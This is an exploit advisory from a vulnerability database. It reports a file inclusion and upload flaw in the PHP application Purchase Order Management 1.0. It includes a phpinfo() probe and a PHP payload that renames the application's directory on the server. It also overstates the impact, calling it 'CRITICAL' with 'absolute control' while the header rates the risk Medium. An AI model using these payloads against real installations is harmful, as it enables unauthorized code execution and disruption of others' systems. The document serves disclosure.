Purchase Order Management-1.0 Local File Inclusion

2023.04.06
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

## Title: Purchase Order Management-1.0 - Local File Inclusion ## Author: nu11secur1ty ## Date: 03.06.2023 ## Vendor: https://www.sourcecodester.com/user/257130/activity ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html ## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/ ## Description: The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities. The users of this system are allowed to submit input into files or upload files to the server. The malicious attacker can get absolute control of this system! STATUS: CRITICAL Vulnerability [+]Get Info: ```PHP <?php // by nu11secur1ty - 2023 phpinfo(); ?> ``` [+]Exploit: ```PHP <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/purchase_order/" ; // New Name For The File $new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0) ## Proof and Exploit: [href](https://streamable.com/vkq31h) ## Time spend: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top